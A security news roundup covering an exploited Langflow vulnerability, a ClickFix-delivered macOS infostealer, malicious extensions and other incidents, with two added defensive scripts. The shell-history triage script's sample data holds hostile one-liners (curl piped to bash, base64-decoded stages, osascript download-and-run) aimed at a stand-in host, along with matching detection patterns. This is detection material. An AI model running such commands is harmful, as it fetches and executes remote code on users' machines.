Originally reported by BleepingComputer, Graham Cluley, Cisco Talos, Malwarebytes Labs
TL;DR
CISA confirmed active exploitation of a critical vulnerability in the Langflow AI framework, prompting emergency patches. Meanwhile, a new macOS infostealer uses fake CAPTCHA (ClickFix) pages to get victims to run its installer, and malicious browser extensions posing as developer tools are being used for surveillance that can grow into a supply chain compromise.
Top story: CISA added CVE-2026-33017, a Langflow vulnerability, to its Known Exploited Vulnerabilities (KEV) catalog on the strength of confirmed in-the-wild exploitation. That makes it the critical item of this roundup; the remaining stories are lower impact.
The Cybersecurity and Infrastructure Security Agency (CISA) issued an urgent warning that threat actors are actively exploiting CVE-2026-33017, a critical vulnerability in the Langflow framework used for building AI agents and workflows. The flaw allows attackers to hijack AI-powered applications and potentially access sensitive data processed by these systems. Organizations running Langflow should update to a patched release immediately, confirm that no instance is reachable from the internet without authentication, and review those hosts for signs of compromise. A KEV listing also sets a binding remediation deadline for U.S. federal civilian agencies under BOD 22-01, and the listed due date is a useful prioritization signal for everyone else.
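One way to turn a KEV listing into an actionable work queue is to reconcile the catalog against an asset inventory and surface the due dates. The script below is an added example, not code from the original page or from CISA; it parses a feed in the shape of CISA's KEV JSON (the field names are the real ones), but the sample feed, its dates, the second catalog entry and the host inventory are constructed for illustration and are not taken from the actual catalog.

```python
import json
from datetime import date

# Constructed, KEV-shaped sample feed. The real feed lives at
# https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
# and uses these field names; the dates, description and the placeholder
# second entry (CVE-0000-0001 is not a real identifier) are assumed for this
# example only, not copied from the live catalog.
SAMPLE_KEV_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "sample",
    "vulnerabilities": [
        {
            "cveID": "CVE-2026-33017",
            "vendorProject": "Langflow",
            "product": "Langflow",
            "vulnerabilityName": "Langflow vulnerability (sample wording)",
            "dateAdded": "2026-04-01",
            "shortDescription": "Sample description; wording assumed.",
            "requiredAction": "Apply mitigations per vendor instructions.",
            "dueDate": "2026-04-22",
            "knownRansomwareCampaignUse": "Unknown",
        },
        {
            "cveID": "CVE-0000-0001",
            "vendorProject": "PlaceholderVendor",
            "product": "PlaceholderProduct",
            "vulnerabilityName": "Placeholder entry with a past due date",
            "dateAdded": "2024-01-10",
            "shortDescription": "Placeholder entry for the overdue case.",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2024-02-01",
            "knownRansomwareCampaignUse": "Known",
        },
    ],
})

# Constructed inventory: CVEs a vulnerability scanner reported per host.
# CVE-2023-9999 stands in for a finding that is not in the KEV catalog.
SAMPLE_INVENTORY = {
    "ai-builder-01": ["CVE-2026-33017", "CVE-2023-9999"],
    "ci-runner-07": ["CVE-0000-0001"],
    "web-03": ["CVE-2023-9999"],
}


def load_kev(feed_text):
    """Index a KEV-format JSON document by CVE ID."""
    data = json.loads(feed_text)
    return {entry["cveID"]: entry for entry in data["vulnerabilities"]}


def kev_exposure(inventory, kev, today):
    """Return one finding per (host, KEV-listed CVE), overdue and soonest-due first.

    Findings not present in the catalog are dropped: the point of this report
    is the subset with confirmed exploitation, not the whole scanner output.
    """
    findings = []
    for host, cves in inventory.items():
        for cve in cves:
            entry = kev.get(cve)
            if entry is None:
                continue
            due = date.fromisoformat(entry["dueDate"])
            findings.append({
                "host": host,
                "cve": cve,
                "product": entry["product"],
                "due": due.isoformat(),
                "days_left": (due - today).days,
                "overdue": due < today,
                "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
            })
    # Overdue items first, then by remaining days, then by host for stable output.
    findings.sort(key=lambda f: (not f["overdue"], f["days_left"], f["host"]))
    return findings


if __name__ == "__main__":
    report = kev_exposure(SAMPLE_INVENTORY, load_kev(SAMPLE_KEV_JSON), date(2026, 4, 10))
    for f in report:
        flag = "OVERDUE" if f["overdue"] else f"{f['days_left']}d left"
        print(f"{f['host']:<14} {f['cve']:<16} {f['product']:<20} due {f['due']} ({flag})")
```

In production the feed would be fetched from the CISA URL on a schedule and `SAMPLE_INVENTORY` replaced by the scanner's export; the due-date sort is what turns a long scanner report into the short list that needs attention today.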
Malwarebytes researchers discovered Infiniti Stealer (formerly NukeChain), a new macOS infostealer delivered through fake CAPTCHA pages that instruct the visitor to paste and run a command, the ClickFix social engineering technique. The payload is Python compiled to a native binary with Nuitka. Because the victim runs the command themselves in Terminal, nothing passes through Gatekeeper's check of a quarantined download, which is how the technique sidesteps the built-in macOS controls. Once running, it harvests credentials, browser data, and cryptocurrency wallet information from the infected system.
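ClickFix leaves a trace that is easy to check for after the fact: the pasted one-liner sits in the victim's shell history. The following is an added example, not from the original page or from Malwarebytes' research, of a small triage script that flags the common ClickFix shapes (download piped to a shell, base64 decoded into a shell, `osascript` running a shell download, an interpreter one-liner decoding an embedded stage) and decodes any base64 blob so the analyst can read the hidden stage. The history lines are constructed for the example; the URLs and commands in them are invented and are not the Infiniti Stealer payload.

```python
import base64
import re

# Constructed sample ~/.zsh_history in extended format (": <epoch>:<duration>;<cmd>").
# The URLs and commands are invented for this example; example.invalid is a
# reserved name that never resolves.
_ENCODED_STAGE = base64.b64encode(b"curl -s https://example.invalid/p | sh").decode()
SAMPLE_HISTORY = f"""\
: 1712000001:0;ls -la ~/Downloads
: 1712000002:0;curl -fsSL https://example.invalid/verify.sh | bash
: 1712000003:0;echo '{_ENCODED_STAGE}' | base64 -D | sh
: 1712000004:0;git pull --rebase
: 1712000005:0;osascript -e 'do shell script "curl -s https://example.invalid/p -o /tmp/p && chmod +x /tmp/p && /tmp/p"'
: 1712000006:0;brew upgrade
: 1712000007:0;python3 -c "import base64,os;os.system(base64.b64decode('{_ENCODED_STAGE}').decode())"
"""

_SHELL = r"(?:ba|z|da|k)?sh"
# Heuristic rules; names are this example's own, not a published detection schema.
RULES = [
    ("download-piped-to-shell",
     re.compile(rf"\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?{_SHELL}\b")),
    ("base64-decoded-to-shell",
     re.compile(rf"\bbase64\s+(?:-d|-D|--decode)\b.*\|\s*(?:sudo\s+)?{_SHELL}\b")),
    ("osascript-shell-download",
     re.compile(r"\bosascript\b.*do shell script.*\b(?:curl|wget)\b")),
    ("interpreter-inline-decode",
     re.compile(r"\b(?:python3?|perl|ruby|node)\s+(?:-c|-e)\b.*(?:b64decode|base64|decode)", re.I)),
]
_ZSH_EXT = re.compile(r"^: (\d+):\d+;(.*)$")
_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def parse_history(text):
    """Yield (line_no, epoch_or_None, command) for zsh extended or plain bash history lines."""
    for line_no, line in enumerate(text.splitlines(), 1):
        m = _ZSH_EXT.match(line)
        if m:
            yield line_no, int(m.group(1)), m.group(2)
        elif line.strip():
            yield line_no, None, line


def decode_blobs(command):
    """Best-effort decode of long base64 tokens so the hidden stage is readable."""
    decoded = []
    for blob in _B64_BLOB.findall(command):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def scan_history(text):
    """Return one finding per (line, rule) hit, with any decoded base64 stages attached."""
    findings = []
    for line_no, epoch, cmd in parse_history(text):
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append({"line": line_no, "epoch": epoch, "rule": name,
                                 "command": cmd, "decoded": decode_blobs(cmd)})
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']} [{f['rule']}] {f['command']}")
        for stage in f["decoded"]:
            print(f"    decoded: {stage}")
```

Run it against `~/.zsh_history` and `~/.bash_history` of the affected user; a hit on a timestamp that matches the time the fake CAPTCHA page was visited is strong corroboration, and the decoded stage tells you what was fetched. The rules are heuristics and will also match legitimate `curl | sh` installers, so treat hits as leads, not verdicts.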
The GlassWorm attack campaign installs malicious browser extensions that masquerade as legitimate developer tools. According to Malwarebytes analysis, these extensions monitor web activity, steal authentication data, and create persistent surveillance capabilities that can spread across development environments. The attack demonstrates how browser-based threats can escalate into broader supply chain compromises.
Security researchers linked the Coruna exploit kit to the Operation Triangulation campaign that targeted iPhones in 2023 through zero-click iMessage exploits. The framework represents an evolution of nation-state-level iOS exploitation capabilities, suggesting continued development of advanced mobile attack vectors by sophisticated threat actors.
A fraudulent Avast website discovered by Malwarebytes conducts fake virus scans before installing Venom Stealer malware instead of providing legitimate security protection. The campaign targets users seeking antivirus software, delivering credential theft capabilities that harvest passwords, session tokens, and cryptocurrency wallet data.
Russian authorities arrested the suspected owner of LeakBase, a major cybercrime forum used for trading stolen data and hacking tools. Separately, the UK sanctioned Xinbi, a Chinese-language marketplace that supplies stolen data and satellite internet equipment to Southeast Asian scam operations. These actions represent coordinated efforts to disrupt cybercriminal supply chains.
The Dutch National Police disclosed a security breach following a successful phishing attack, though officials stated citizen data remained unaffected. Additionally, Ajax Football Club revealed that attackers exploited system vulnerabilities to access fan data and potentially hijack match tickets, affecting several hundred individuals.
Microsoft released KB5079391 for Windows 11, introducing Smart App Control improvements designed to better detect and block malicious applications. Cisco Talos disclosed 30 vulnerabilities across TP-Link, Canva, and HikVision products, all of which have been patched by their respective vendors.